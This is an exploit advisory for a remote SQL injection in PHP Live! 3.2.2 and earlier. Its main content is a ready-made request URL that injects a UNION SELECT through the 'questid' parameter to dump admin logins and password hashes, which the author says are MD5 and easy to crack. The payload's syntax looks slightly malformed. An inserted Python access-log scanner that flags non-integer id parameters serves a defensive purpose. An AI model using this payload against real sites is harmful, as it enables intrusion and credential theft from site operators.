# Title : PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability
# Published : 2008-02-14
# Author : Xar
[!]Info[!]
PHP Live! (© OSI Codes Inc.) enables live help and live customer support communication directly from your website. With PHP Live!, you can provide one-on-one chat assistance in real-time, answer visitor questions and add that extra human touch to your website.
[!]SQL Injection[!]
Code:
phplive//admin/traffic/knowledge_searchm.php?l=phplive&x=1&action=expand_question&questid=-1+union+all+select+1,2,3,4,5,6,concat(login,char(5,password),8+from+chat_admin--&deptid=2&catid=1&keyword=a
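A defender-side check for the request above, as an added example that is not part of the original advisory: it scans web access log lines for requests to knowledge_searchm.php whose questid, deptid or catid value is not a plain integer. The log lines are constructed samples, and treating those three parameters as short unsigned integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script and parameter names come from the advisory's request.
TARGET_SCRIPT = "knowledge_searchm.php"
NUMERIC_PARAMS = ("questid", "deptid", "catid")
# Assumption: legitimate ids are short unsigned integers.
INT_RE = re.compile(r"\d{1,10}")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2008:10:00:01 +0000] "GET /phplive/admin/traffic/'
    'knowledge_searchm.php?l=phplive&x=1&action=expand_question&questid=12'
    '&deptid=2&catid=1&keyword=a HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Feb/2008:10:03:44 +0000] "GET /phplive//admin/traffic/'
    'knowledge_searchm.php?l=phplive&x=1&action=expand_question'
    '&questid=-1+union+all+select+1,2,3&deptid=2&catid=1&keyword=a HTTP/1.1" 200 812',
    '192.0.2.10 - - [14/Feb/2008:10:05:09 +0000] "GET /phplive/index.php'
    '?questid=abc HTTP/1.1" 200 100',
]

def bad_params(url):
    """Return {param: decoded value} for id parameters that are not plain integers."""
    parts = urlsplit(url)
    if not parts.path.endswith("/" + TARGET_SCRIPT):
        return {}
    # parse_qs decodes '+' and %XX, so encoded payloads are compared in clear form.
    query = parse_qs(parts.query, keep_blank_values=True)
    return {name: value
            for name in NUMERIC_PARAMS
            for value in query.get(name, [])
            if not INT_RE.fullmatch(value)}

def scan(log_lines):
    """Return a list of (client_ip, bad_params) for each suspicious request."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = bad_params(match.group(1))
        if bad:
            hits.append((line.split(" ", 1)[0], bad))
    return hits

if __name__ == "__main__":
    for ip, bad in scan(SAMPLE_LOG):
        print(ip, bad)
```

The same integer-only rule applies server-side: rejecting or casting these parameters before they reach the query closes the injection point regardless of what the log scan finds.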
[!]Info[!]
+Hashes are regular md5 - easy to crack
Dork: "Find your own ;)"
Credits -
Found by Xar of h4ck-y0u
Greets to Don & ViSiOn
# www.Syue.com [2008-02-14]